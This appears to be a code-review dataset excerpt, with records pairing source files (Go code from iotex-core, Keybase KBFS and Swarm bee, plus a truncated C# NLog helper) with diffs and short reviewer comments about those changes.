big.NewInt(0).Sub(tsfTest.senderBalance, tsfTest.amount) gasUnitPayloadConsumed := big.NewInt(0).Mul(big.NewInt(int64(action.TransferPayloadGas)), big.NewInt(int64(len(tsfTest.payload)))) gasUnitTransferConsumed := big.NewInt(int64(action.TransferBaseIntrinsicGas)) gasUnitConsumed := big.NewInt(0).Add(gasUnitPayloadConsumed, gasUnitTransferConsumed) gasConsumed := big.NewInt(0).Mul(gasUnitConsumed, tsfTest.gasPrice) expectedSenderBalance := big.NewInt(0).Sub(minusAmount, gasConsumed) require.Equal(expectedSenderBalance.String(), newSenderState.Balance.String(), tsfTest.message) newRecvState, err := accountutil.AccountState(sf, recvAddr) require.NoError(err) expectedRecvrBalance := big.NewInt(0) if tsfTest.recvAcntState == AcntNotRegistered { expectedRecvrBalance.Set(tsfTest.amount) } else { expectedRecvrBalance.Add(tsfTest.recvBalance, tsfTest.amount) } require.Equal(expectedRecvrBalance.String(), newRecvState.Balance.String(), tsfTest.message) case TsfFail: require.Error(err, tsfTest.message) //The transfer should be rejected right after we inject it //Wait long enough to make sure the failed transfer does not exit in either action pool or blockchain err := backoff.Retry(func() error { var err error _, err = ap.GetActionByHash(tsf.Hash()) return err }, bo) require.Error(err, tsfTest.message) _, err = as.GetActionByActionHash(tsf.Hash()) require.Error(err, tsfTest.message) if tsfTest.senderAcntState == AcntCreate || tsfTest.senderAcntState == AcntExist { newSenderState, _ := accountutil.AccountState(sf, senderAddr) require.Equal(tsfTest.senderBalance.String(), newSenderState.Balance.String()) } case TsfPending: require.NoError(err, tsfTest.message) //Need to wait long enough to make sure the pending transfer is not minted, only stay in action pool err := backoff.Retry(func() error { var err error _, err = ap.GetActionByHash(tsf.Hash()) return err }, bo) require.NoError(err, tsfTest.message) _, err = as.GetActionByActionHash(tsf.Hash()) require.Error(err, tsfTest.message) case TsfFinal: require.NoError(err, tsfTest.message) //After a blocked is minted, check all the pending transfers in action pool are cleared //This checking procedure is simplified for this test case, because of the complexity of //handling pending transfers. time.Sleep(cfg.Genesis.BlockInterval + time.Second) require.Equal(0, lenPendingActionMap(ap.PendingActionMap()), tsfTest.message) default: require.True(false, tsfTest.message) } } } // initStateKeyAddr, if the given private key is nil, // creates key, address, and init the new account with given balance // otherwise, calculate the the address, and load test with existing // balance state. func initStateKeyAddr( accountState AccountState, privateKey crypto.PrivateKey, initBalance *big.Int, bc blockchain.Blockchain, sf factory.Factory, ) (crypto.PrivateKey, string, error) { retKey := privateKey retAddr := "" switch accountState { case AcntCreate: addr, err := address.FromBytes(retKey.PublicKey().Hash()) if err != nil { return nil, "", err } retAddr = addr.String() case AcntExist: addr, err := address.FromBytes(retKey.PublicKey().Hash()) if err != nil { return nil, "", err } retAddr = addr.String() existState, err := accountutil.AccountState(sf, retAddr) if err != nil { return nil, "", err } initBalance.Set(existState.Balance) case AcntNotRegistered: sk, err := crypto.GenerateKey() if err != nil { return nil, "", err } addr, err := address.FromBytes(sk.PublicKey().Hash()) if err != nil { return nil, "", err } retAddr = addr.String() retKey = sk case AcntBadAddr: rand.Seed(time.Now().UnixNano()) b := make([]byte, 41) for i := range b { b[i] = byte(65 + rand.Intn(26)) } retAddr = string(b) } return retKey, retAddr, nil } func getLocalKey(i int) crypto.PrivateKey { sk, _ := crypto.HexStringToPrivateKey(localKeys[i]) return sk } func newTransferConfig( chainDBPath, trieDBPath, indexDBPath string, bloomfilterIndex string, systemLogDBPath string, candidateIndexDBPath string, networkPort, apiPort int, ) (config.Config, error) { cfg := config.Default cfg.Plugins[config.GatewayPlugin] = true cfg.Network.Port = networkPort cfg.Chain.ID = 1 cfg.Chain.ChainDBPath = chainDBPath cfg.Chain.TrieDBPath = trieDBPath cfg.Chain.IndexDBPath = indexDBPath cfg.Chain.BloomfilterIndexDBPath = bloomfilterIndex cfg.System.SystemLogDBPath = systemLogDBPath cfg.Chain.CandidateIndexDBPath = candidateIndexDBPath cfg.Chain.EnableAsyncIndexWrite = true cfg.ActPool.MinGasPriceStr = "0" cfg.Consensus.Scheme = config.StandaloneScheme cfg.API.Port = apiPort cfg.Genesis.BlockInterval = 800 * time.Millisecond return cfg, nil } func lenPendingActionMap(acts map[string][]action.SealedEnvelope) int { l := 0 for _, part := range acts { l += len(part) } return l }
1
23,046
think we need to find out the root-cause and fix, instead of just removing `NoError`? it erred b/c `context canceled`, so call this before context cancelled is the right fix
iotexproject-iotex-core
go
@@ -405,7 +405,10 @@ func (b *BlockServerRemote) Get(ctx context.Context, tlfID tlf.ID, id kbfsblock. id, tlfID, context, size) dbc := b.config.DiskBlockCache() if dbc != nil { - go dbc.Put(ctx, tlfID, id, buf, serverHalf) + // This used to be called in a goroutine to prevent blocking + // the `Get`. But we need this cached synchronously for + // later behavior. + dbc.Put(ctx, tlfID, id, buf, serverHalf) } } }()
1
// Copyright 2016 Keybase Inc. All rights reserved. // Use of this source code is governed by a BSD // license that can be found in the LICENSE file. package libkbfs import ( "errors" "sync" "time" "github.com/keybase/backoff" "github.com/keybase/client/go/libkb" "github.com/keybase/client/go/logger" "github.com/keybase/client/go/protocol/keybase1" "github.com/keybase/go-framed-msgpack-rpc/rpc" "github.com/keybase/kbfs/kbfsblock" "github.com/keybase/kbfs/kbfscrypto" "github.com/keybase/kbfs/tlf" "golang.org/x/net/context" ) const ( // BServerTokenServer is the expected server type for bserver authentication. BServerTokenServer = "kbfs_block" // BServerTokenExpireIn is the TTL to use when constructing an authentication token. BServerTokenExpireIn = 2 * 60 * 60 // 2 hours // BServerDefaultPingIntervalSeconds is the default interval on which the // client should contact the block server. BServerDefaultPingIntervalSeconds = 10 // BServerPingTimeout is how long to wait for a ping response // before breaking the connection and trying to reconnect. BServerPingTimeout = 30 * time.Second ) // blockServerRemoteAuthTokenRefresher is a helper struct for // refreshing auth tokens and managing connections. type blockServerRemoteClientHandler struct { name string log logger.Logger deferLog logger.Logger csg CurrentSessionGetter authToken *kbfscrypto.AuthToken srvAddr string connOpts rpc.ConnectionOpts rpcLogFactory *libkb.RPCLogFactory pinger pinger connMu sync.RWMutex conn *rpc.Connection client keybase1.BlockInterface } func newBlockServerRemoteClientHandler(name string, log logger.Logger, signer kbfscrypto.Signer, csg CurrentSessionGetter, srvAddr string, rpcLogFactory *libkb.RPCLogFactory) *blockServerRemoteClientHandler { deferLog := log.CloneWithAddedDepth(1) b := &blockServerRemoteClientHandler{ name: name, log: log, deferLog: deferLog, csg: csg, srvAddr: srvAddr, rpcLogFactory: rpcLogFactory, } b.pinger = pinger{ name: name, doPing: b.pingOnce, timeout: BServerPingTimeout, log: log, } b.authToken = kbfscrypto.NewAuthToken( signer, BServerTokenServer, BServerTokenExpireIn, "libkbfs_bserver_remote", VersionString(), b) constBackoff := backoff.NewConstantBackOff(RPCReconnectInterval) b.connOpts = rpc.ConnectionOpts{ DontConnectNow: true, // connect only on-demand WrapErrorFunc: libkb.WrapError, TagsFunc: libkb.LogTagsFromContext, ReconnectBackoff: func() backoff.BackOff { return constBackoff }, } b.initNewConnection() return b } func (b *blockServerRemoteClientHandler) initNewConnection() { b.connMu.Lock() defer b.connMu.Unlock() if b.conn != nil { b.conn.Shutdown() } b.conn = rpc.NewTLSConnection( b.srvAddr, kbfscrypto.GetRootCerts(b.srvAddr), kbfsblock.BServerErrorUnwrapper{}, b, b.rpcLogFactory, b.log, b.connOpts) b.client = keybase1.BlockClient{Cli: b.conn.GetClient()} } func (b *blockServerRemoteClientHandler) shutdown() { if b.authToken != nil { b.authToken.Shutdown() } b.connMu.Lock() defer b.connMu.Unlock() if b.conn != nil { b.conn.Shutdown() } // cancel the ping ticker b.pinger.cancelTicker() } func (b *blockServerRemoteClientHandler) getConn() *rpc.Connection { b.connMu.RLock() defer b.connMu.RUnlock() return b.conn } func (b *blockServerRemoteClientHandler) getClient() keybase1.BlockInterface { b.connMu.RLock() defer b.connMu.RUnlock() return b.client } type ctxBServerResetKeyType int const ( // ctxBServerResetKey identifies whether the current context has // already passed through `BServerRemote.resetAuth`. ctxBServerResetKey ctxBServerResetKeyType = iota ) // resetAuth is called to reset the authorization on a BlockServer // connection. func (b *blockServerRemoteClientHandler) resetAuth( ctx context.Context, c keybase1.BlockInterface) (err error) { ctx = context.WithValue(ctx, ctxBServerResetKey, b.name) defer func() { b.deferLog.CDebugf( ctx, "BlockServerRemote: resetAuth called, err: %#v", err) }() session, err := b.csg.GetCurrentSession(ctx) if err != nil { b.log.CDebugf( ctx, "%s: User logged out, skipping resetAuth", b.name) return nil } // request a challenge challenge, err := c.GetSessionChallenge(ctx) if err != nil { return err } // get a new signature signature, err := b.authToken.Sign(ctx, session.Name, session.UID, session.VerifyingKey, challenge) if err != nil { return err } return c.AuthenticateSession(ctx, signature) } // RefreshAuthToken implements the AuthTokenRefreshHandler interface. func (b *blockServerRemoteClientHandler) RefreshAuthToken( ctx context.Context) { if v := ctx.Value(ctxBServerResetKey); v == b.name { b.log.CDebugf(ctx, "Avoiding resetAuth recursion") return } if err := b.resetAuth(ctx, b.client); err != nil { b.log.CDebugf(ctx, "%s: error refreshing auth token: %v", b.name, err) } } var _ kbfscrypto.AuthTokenRefreshHandler = (*blockServerRemoteClientHandler)(nil) // HandlerName implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) HandlerName() string { return b.name } // OnConnect implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) OnConnect(ctx context.Context, conn *rpc.Connection, client rpc.GenericClient, _ *rpc.Server) error { // reset auth -- using client here would cause problematic recursion. c := keybase1.BlockClient{Cli: client} err := b.resetAuth(ctx, c) if err != nil { return err } // Start pinging. b.pinger.resetTicker(BServerDefaultPingIntervalSeconds) return nil } // OnConnectError implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) OnConnectError(err error, wait time.Duration) { b.log.Warning("%s: connection error: %v; retrying in %s", b.name, err, wait) if b.authToken != nil { b.authToken.Shutdown() } b.pinger.cancelTicker() // TODO: it might make sense to show something to the user if this is // due to authentication, for example. } // OnDoCommandError implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) OnDoCommandError(err error, wait time.Duration) { b.log.Warning("%s: DoCommand error: %v; retrying in %s", b.name, err, wait) } // OnDisconnected implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) OnDisconnected(ctx context.Context, status rpc.DisconnectStatus) { if status == rpc.StartingNonFirstConnection { b.log.CWarningf(ctx, "%s: disconnected", b.name) } if b.authToken != nil { b.authToken.Shutdown() } b.pinger.cancelTicker() } // ShouldRetry implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) ShouldRetry(rpcName string, err error) bool { //do not let connection.go's DoCommand retry any batch rpcs automatically //because i will manually retry them without successfully completed references switch rpcName { case "keybase.1.block.delReferenceWithCount": return false case "keybase.1.block.archiveReferenceWithCount": return false case "keybase.1.block.archiveReference": return false } if _, ok := err.(kbfsblock.BServerErrorThrottle); ok { return true } if quotaErr, ok := err.(kbfsblock.BServerErrorOverQuota); ok && quotaErr.Throttled { return true } return false } // ShouldRetryOnConnect implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) ShouldRetryOnConnect(err error) bool { _, inputCanceled := err.(libkb.InputCanceledError) return !inputCanceled } var _ rpc.ConnectionHandler = (*blockServerRemoteClientHandler)(nil) func (b *blockServerRemoteClientHandler) pingOnce(ctx context.Context) { _, err := b.getClient().BlockPing(ctx) if err == context.DeadlineExceeded { b.log.CDebugf( ctx, "%s: Ping timeout -- reinitializing connection", b.name) b.initNewConnection() } else if err != nil { b.log.CDebugf(ctx, "%s: ping error %s", b.name, err) } } type blockServerRemoteConfig interface { diskBlockCacheGetter codecGetter signerGetter currentSessionGetterGetter logMaker } // BlockServerRemote implements the BlockServer interface and // represents a remote KBFS block server. type BlockServerRemote struct { config blockServerRemoteConfig shutdownFn func() log traceLogger deferLog traceLogger blkSrvAddr string putConn *blockServerRemoteClientHandler getConn *blockServerRemoteClientHandler } // Test that BlockServerRemote fully implements the BlockServer interface. var _ BlockServer = (*BlockServerRemote)(nil) // NewBlockServerRemote constructs a new BlockServerRemote for the // given address. func NewBlockServerRemote(config blockServerRemoteConfig, blkSrvAddr string, rpcLogFactory *libkb.RPCLogFactory) *BlockServerRemote { log := config.MakeLogger("BSR") deferLog := log.CloneWithAddedDepth(1) bs := &BlockServerRemote{ config: config, log: traceLogger{log}, deferLog: traceLogger{deferLog}, blkSrvAddr: blkSrvAddr, } // Use two separate auth clients -- one for writes and one for // reads. This allows small reads to avoid getting trapped behind // large asynchronous writes. TODO: use some real network QoS to // achieve better prioritization within the actual network. bs.putConn = newBlockServerRemoteClientHandler( "BlockServerRemotePut", log, config.Signer(), config.CurrentSessionGetter(), blkSrvAddr, rpcLogFactory) bs.getConn = newBlockServerRemoteClientHandler( "BlockServerRemoteGet", log, config.Signer(), config.CurrentSessionGetter(), blkSrvAddr, rpcLogFactory) bs.shutdownFn = func() { bs.putConn.shutdown() bs.getConn.shutdown() } return bs } // For testing. func newBlockServerRemoteWithClient(config blockServerRemoteConfig, client keybase1.BlockInterface) *BlockServerRemote { log := config.MakeLogger("BSR") deferLog := log.CloneWithAddedDepth(1) bs := &BlockServerRemote{ config: config, log: traceLogger{log}, deferLog: traceLogger{deferLog}, putConn: &blockServerRemoteClientHandler{ log: log, deferLog: deferLog, client: client, }, getConn: &blockServerRemoteClientHandler{ log: log, deferLog: deferLog, client: client, }, } return bs } // RemoteAddress returns the remote bserver this client is talking to func (b *BlockServerRemote) RemoteAddress() string { return b.blkSrvAddr } // RefreshAuthToken implements the AuthTokenRefreshHandler interface. func (b *BlockServerRemote) RefreshAuthToken(ctx context.Context) { b.putConn.RefreshAuthToken(ctx) b.getConn.RefreshAuthToken(ctx) } func makeBlockIDCombo(id kbfsblock.ID, context kbfsblock.Context) keybase1.BlockIdCombo { // ChargedTo is somewhat confusing when this BlockIdCombo is // used in a BlockReference -- it just refers to the original // creator of the block, i.e. the original user charged for // the block. // // This may all change once we implement groups. return keybase1.BlockIdCombo{ BlockHash: id.String(), ChargedTo: context.GetCreator(), BlockType: context.GetBlockType(), } } func makeBlockReference(id kbfsblock.ID, context kbfsblock.Context) keybase1.BlockReference { // Block references to MD blocks are allowed, because they can be // deleted in the case of an MD put failing. return keybase1.BlockReference{ Bid: makeBlockIDCombo(id, context), // The actual writer to modify quota for. ChargedTo: context.GetWriter(), Nonce: keybase1.BlockRefNonce(context.GetRefNonce()), } } // Get implements the BlockServer interface for BlockServerRemote. func (b *BlockServerRemote) Get(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context) ( buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf, err error) { size := -1 b.log.LazyTrace(ctx, "BServer: Get %s", id) defer func() { b.log.LazyTrace(ctx, "BServer: Get %s done (err=%v)", id, err) if err != nil { b.deferLog.CWarningf( ctx, "Get id=%s tlf=%s context=%s sz=%d err=%v", id, tlfID, context, size, err) } else { b.deferLog.CDebugf( ctx, "Get id=%s tlf=%s context=%s sz=%d", id, tlfID, context, size) dbc := b.config.DiskBlockCache() if dbc != nil { go dbc.Put(ctx, tlfID, id, buf, serverHalf) } } }() arg := keybase1.GetBlockArg{ Bid: makeBlockIDCombo(id, context), Folder: tlfID.String(), } res, err := b.getConn.getClient().GetBlock(ctx, arg) if err != nil { return nil, kbfscrypto.BlockCryptKeyServerHalf{}, err } size = len(res.Buf) serverHalf, err = kbfscrypto.ParseBlockCryptKeyServerHalf(res.BlockKey) if err != nil { return nil, kbfscrypto.BlockCryptKeyServerHalf{}, err } return res.Buf, serverHalf, nil } // Put implements the BlockServer interface for BlockServerRemote. func (b *BlockServerRemote) Put(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, bContext kbfsblock.Context, buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf) (err error) { dbc := b.config.DiskBlockCache() if dbc != nil { go dbc.Put(ctx, tlfID, id, buf, serverHalf) } size := len(buf) b.log.LazyTrace(ctx, "BServer: Put %s", id) defer func() { b.log.LazyTrace(ctx, "BServer: Put %s done (err=%v)", id, err) if err != nil { b.deferLog.CWarningf( ctx, "Put id=%s tlf=%s context=%s sz=%d err=%v", id, tlfID, bContext, size, err) } else { b.deferLog.CDebugf( ctx, "Put id=%s tlf=%s context=%s sz=%d", id, tlfID, bContext, size) } }() arg := keybase1.PutBlockArg{ Bid: makeBlockIDCombo(id, bContext), // BlockKey is misnamed -- it contains just the server // half. BlockKey: serverHalf.String(), Folder: tlfID.String(), Buf: buf, } // Handle OverQuota errors at the caller return b.putConn.getClient().PutBlock(ctx, arg) } // PutAgain implements the BlockServer interface for BlockServerRemote func (b *BlockServerRemote) PutAgain(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, bContext kbfsblock.Context, buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf) (err error) { dbc := b.config.DiskBlockCache() if dbc != nil { go dbc.Put(ctx, tlfID, id, buf, serverHalf) } size := len(buf) b.log.LazyTrace(ctx, "BServer: Put %s", id) defer func() { b.log.LazyTrace(ctx, "BServer: Put %s done (err=%v)", id, err) if err != nil { b.deferLog.CWarningf( ctx, "Put id=%s tlf=%s context=%s sz=%d err=%v", id, tlfID, bContext, size, err) } else { b.deferLog.CDebugf( ctx, "Put id=%s tlf=%s context=%s sz=%d", id, tlfID, bContext, size) } }() arg := keybase1.PutBlockAgainArg{ BlockKey: serverHalf.String(), Folder: tlfID.String(), Buf: buf, Ref: makeBlockReference(id, bContext), } // Handle OverQuota errors at the caller return b.putConn.getClient().PutBlockAgain(ctx, arg) } // AddBlockReference implements the BlockServer interface for BlockServerRemote func (b *BlockServerRemote) AddBlockReference(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context) (err error) { b.log.LazyTrace(ctx, "BServer: AddRef %s", id) defer func() { b.log.LazyTrace(ctx, "BServer: AddRef %s done (err=%v)", id, err) if err != nil { b.deferLog.CWarningf( ctx, "AddBlockReference id=%s tlf=%s context=%s err=%v", id, tlfID, context, err) } else { b.deferLog.CDebugf( ctx, "AddBlockReference id=%s tlf=%s context=%s", id, tlfID, context) } }() // Handle OverQuota errors at the caller return b.putConn.getClient().AddReference(ctx, keybase1.AddReferenceArg{ Ref: makeBlockReference(id, context), Folder: tlfID.String(), }) } // RemoveBlockReferences implements the BlockServer interface for // BlockServerRemote func (b *BlockServerRemote) RemoveBlockReferences(ctx context.Context, tlfID tlf.ID, contexts kbfsblock.ContextMap) (liveCounts map[kbfsblock.ID]int, err error) { // TODO: Define a more compact printout of contexts. b.log.LazyTrace(ctx, "BServer: RemRef %v", contexts) defer func() { b.log.LazyTrace(ctx, "BServer: RemRef %v done (err=%v)", contexts, err) if err != nil { b.deferLog.CWarningf(ctx, "RemoveBlockReferences batch size=%d err=%v", len(contexts), err) } else { b.deferLog.CDebugf(ctx, "RemoveBlockReferences batch size=%d", len(contexts)) } }() doneRefs, err := b.batchDowngradeReferences(ctx, tlfID, contexts, false) liveCounts = make(map[kbfsblock.ID]int) for id, nonces := range doneRefs { for _, count := range nonces { if existing, ok := liveCounts[id]; !ok || existing > count { liveCounts[id] = count } } } return liveCounts, err } // ArchiveBlockReferences implements the BlockServer interface for // BlockServerRemote func (b *BlockServerRemote) ArchiveBlockReferences(ctx context.Context, tlfID tlf.ID, contexts kbfsblock.ContextMap) (err error) { b.log.LazyTrace(ctx, "BServer: ArchiveRef %v", contexts) defer func() { b.log.LazyTrace(ctx, "BServer: ArchiveRef %v done (err=%v)", contexts, err) if err != nil { b.deferLog.CWarningf(ctx, "ArchiveBlockReferences batch size=%d err=%v", len(contexts), err) } else { b.deferLog.CDebugf(ctx, "ArchiveBlockReferences batch size=%d", len(contexts)) } }() _, err = b.batchDowngradeReferences(ctx, tlfID, contexts, true) return err } // IsUnflushed implements the BlockServer interface for BlockServerRemote. func (b *BlockServerRemote) IsUnflushed( _ context.Context, _ tlf.ID, _ kbfsblock.ID) ( bool, error) { return false, nil } // batchDowngradeReferences archives or deletes a batch of references func (b *BlockServerRemote) batchDowngradeReferences(ctx context.Context, tlfID tlf.ID, contexts kbfsblock.ContextMap, archive bool) ( doneRefs map[kbfsblock.ID]map[kbfsblock.RefNonce]int, finalError error) { doneRefs = make(map[kbfsblock.ID]map[kbfsblock.RefNonce]int) notDone := b.getNotDone(contexts, doneRefs) throttleErr := backoff.Retry(func() error { var res keybase1.DowngradeReferenceRes var err error if archive { res, err = b.putConn.getClient().ArchiveReferenceWithCount(ctx, keybase1.ArchiveReferenceWithCountArg{ Refs: notDone, Folder: tlfID.String(), }) } else { res, err = b.putConn.getClient().DelReferenceWithCount(ctx, keybase1.DelReferenceWithCountArg{ Refs: notDone, Folder: tlfID.String(), }) } // log errors if err != nil { b.log.CWarningf(ctx, "batchDowngradeReferences archive %t sent=%v done=%v failedRef=%v err=%v", archive, notDone, res.Completed, res.Failed, err) } else { b.log.CDebugf(ctx, "batchDowngradeReferences archive %t notdone=%v all succeeded", archive, notDone) } // update the set of completed reference for _, ref := range res.Completed { bid, err := kbfsblock.IDFromString(ref.Ref.Bid.BlockHash) if err != nil { continue } nonces, ok := doneRefs[bid] if !ok { nonces = make(map[kbfsblock.RefNonce]int) doneRefs[bid] = nonces } nonces[kbfsblock.RefNonce(ref.Ref.Nonce)] = ref.LiveCount } // update the list of references to downgrade notDone = b.getNotDone(contexts, doneRefs) //if context is cancelled, return immediately select { case <-ctx.Done(): finalError = ctx.Err() return nil default: } // check whether to backoff and retry if err != nil { // if error is of type throttle, retry if _, ok := err.(kbfsblock.BServerErrorThrottle); ok { return err } // non-throttle error, do not retry here finalError = err } return nil }, backoff.NewExponentialBackOff()) // if backoff has given up retrying, return error if throttleErr != nil { return doneRefs, throttleErr } if finalError == nil { if len(notDone) != 0 { b.log.CErrorf(ctx, "batchDowngradeReferences finished successfully with outstanding refs? all=%v done=%v notDone=%v\n", contexts, doneRefs, notDone) return doneRefs, errors.New("batchDowngradeReferences inconsistent result") } } return doneRefs, finalError } // getNotDone returns the set of block references in "all" that do not yet appear in "results" func (b *BlockServerRemote) getNotDone(all kbfsblock.ContextMap, doneRefs map[kbfsblock.ID]map[kbfsblock.RefNonce]int) ( notDone []keybase1.BlockReference) { for id, idContexts := range all { for _, context := range idContexts { if _, ok := doneRefs[id]; ok { if _, ok1 := doneRefs[id][context.GetRefNonce()]; ok1 { continue } } ref := makeBlockReference(id, context) notDone = append(notDone, ref) } } return notDone } // GetUserQuotaInfo implements the BlockServer interface for BlockServerRemote func (b *BlockServerRemote) GetUserQuotaInfo(ctx context.Context) (info *kbfsblock.QuotaInfo, err error) { b.log.LazyTrace(ctx, "BServer: GetUserQuotaInfo") defer func() { b.log.LazyTrace(ctx, "BServer: GetUserQuotaInfo done (err=%v)", err) }() res, err := b.getConn.getClient().GetUserQuotaInfo(ctx) if err != nil { return nil, err } return kbfsblock.QuotaInfoDecode(res, b.config.Codec()) } // GetTeamQuotaInfo implements the BlockServer interface for BlockServerRemote func (b *BlockServerRemote) GetTeamQuotaInfo( ctx context.Context, tid keybase1.TeamID) ( info *kbfsblock.QuotaInfo, err error) { b.log.LazyTrace(ctx, "BServer: GetTeamQuotaInfo") defer func() { b.log.LazyTrace(ctx, "BServer: GetTeamQuotaInfo done (err=%v)", err) }() res, err := b.getConn.getClient().GetTeamQuotaInfo(ctx, tid) if err != nil { return nil, err } return kbfsblock.QuotaInfoDecode(res, b.config.Codec()) } // Shutdown implements the BlockServer interface for BlockServerRemote. func (b *BlockServerRemote) Shutdown(ctx context.Context) { if b.shutdownFn != nil { b.shutdownFn() } b.getConn.shutdown() b.putConn.shutdown() }
1
17,899
Please expand "later behavior". Presumably something to do with the prefetch logic?
keybase-kbfs
go
@@ -66,7 +66,7 @@ func (s *server) splitUpload(ctx context.Context, r io.ReadCloser, l int64) (int response.Message = "upload error" response.Code = http.StatusInternalServerError err = fmt.Errorf("%s: %v", response.Message, err) - return response, err + return swarm.ZeroAddress, err } return bytesPostResponse{Reference: address}, nil }
1
// Copyright 2020 The Swarm Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package api import ( "context" "errors" "fmt" "io" "net/http" "github.com/gorilla/mux" "github.com/ethersphere/bee/pkg/file" "github.com/ethersphere/bee/pkg/file/joiner" "github.com/ethersphere/bee/pkg/file/splitter" "github.com/ethersphere/bee/pkg/jsonhttp" "github.com/ethersphere/bee/pkg/storage" "github.com/ethersphere/bee/pkg/swarm" ) type bytesPostResponse struct { Reference swarm.Address `json:"reference"` } // bytesUploadHandler handles upload of raw binary data of arbitrary length. func (s *server) bytesUploadHandler(w http.ResponseWriter, r *http.Request) { ctx := r.Context() responseObject, err := s.splitUpload(ctx, r.Body, r.ContentLength) if err != nil { s.Logger.Debugf("bytes upload: %v", err) o := responseObject.(jsonhttp.StatusResponse) jsonhttp.Respond(w, o.Code, o) } else { jsonhttp.OK(w, responseObject) } } func (s *server) splitUpload(ctx context.Context, r io.ReadCloser, l int64) (interface{}, error) { chunkPipe := file.NewChunkPipe() go func() { buf := make([]byte, swarm.ChunkSize) c, err := io.CopyBuffer(chunkPipe, r, buf) if err != nil { s.Logger.Debugf("split upload: io error %d: %v", c, err) s.Logger.Error("io error") return } if c != l { s.Logger.Debugf("split upload: read count mismatch %d: %v", c, err) s.Logger.Error("read count mismatch") return } err = chunkPipe.Close() if err != nil { s.Logger.Errorf("split upload: incomplete file write close %v", err) s.Logger.Error("incomplete file write close") } }() sp := splitter.NewSimpleSplitter(s.Storer) address, err := sp.Split(ctx, chunkPipe, l) var response jsonhttp.StatusResponse if err != nil { response.Message = "upload error" response.Code = http.StatusInternalServerError err = fmt.Errorf("%s: %v", response.Message, err) return response, err } return bytesPostResponse{Reference: address}, nil } // bytesGetHandler handles retrieval of raw binary data of arbitrary length. func (s *server) bytesGetHandler(w http.ResponseWriter, r *http.Request) { addressHex := mux.Vars(r)["address"] ctx := r.Context() address, err := swarm.ParseHexAddress(addressHex) if err != nil { s.Logger.Debugf("bytes: parse address %s: %v", addressHex, err) s.Logger.Error("bytes: parse address error") jsonhttp.BadRequest(w, "invalid address") return } j := joiner.NewSimpleJoiner(s.Storer) dataSize, err := j.Size(ctx, address) if err != nil { if errors.Is(err, storage.ErrNotFound) { s.Logger.Debugf("bytes: not found %s: %v", address, err) s.Logger.Error("bytes: not found") jsonhttp.NotFound(w, "not found") return } s.Logger.Debugf("bytes: invalid root chunk %s: %v", address, err) s.Logger.Error("bytes: invalid root chunk") jsonhttp.BadRequest(w, "invalid root chunk") return } w.Header().Set("Content-Type", "application/octet-stream") w.Header().Set("Content-Length", fmt.Sprintf("%d", dataSize)) c, err := file.JoinReadAll(j, address, w) if err != nil && c == 0 { s.Logger.Errorf("bytes: data write %s: %v", address, err) s.Logger.Error("bytes: data input error") jsonhttp.InternalServerError(w, "retrieval fail") } }
1
10,486
The `response` variable is not used, it can be removed, also the fmt.Errorf.
ethersphere-bee
go
@@ -51,10 +51,7 @@ namespace NLog.Internal internal static bool IsNullOrWhiteSpace(string value) { #if NET3_5 - - if (value == null) return true; - if (value.Length == 0) return true; - return String.IsNullOrEmpty(value.Trim()); + return value?.Length > 0 ? string.IsNullOrEmpty(value.Trim()) : true; #else return string.IsNullOrWhiteSpace(value); #endif
1
// // Copyright (c) 2004-2021 Jaroslaw Kowalski <[email protected]>, Kim Christensen, Julian Verdurmen // // All rights reserved. // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // // * Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // // * Neither the name of Jaroslaw Kowalski nor the names of its // contributors may be used to endorse or promote products derived from this // software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF // THE POSSIBILITY OF SUCH DAMAGE. // using System; using System.Linq; using JetBrains.Annotations; namespace NLog.Internal { /// <summary> /// Helpers for <see cref="string"/>. /// </summary> public static class StringHelpers { /// <summary> /// IsNullOrWhiteSpace, including for .NET 3.5 /// </summary> /// <param name="value"></param> /// <returns></returns> [ContractAnnotation("value:null => true")] internal static bool IsNullOrWhiteSpace(string value) { #if NET3_5 if (value == null) return true; if (value.Length == 0) return true; return String.IsNullOrEmpty(value.Trim()); #else return string.IsNullOrWhiteSpace(value); #endif } internal static string[] SplitAndTrimTokens(this string value, char delimiter) { if (IsNullOrWhiteSpace(value)) return ArrayHelper.Empty<string>(); if (value.IndexOf(delimiter) == -1) { return new[] { value.Trim() }; } var result = value.Split(new char[] { delimiter }, StringSplitOptions.RemoveEmptyEntries); for (int i = 0; i < result.Length; ++i) { result[i] = result[i].Trim(); if (string.IsNullOrEmpty(result[i])) return result.Where(s => 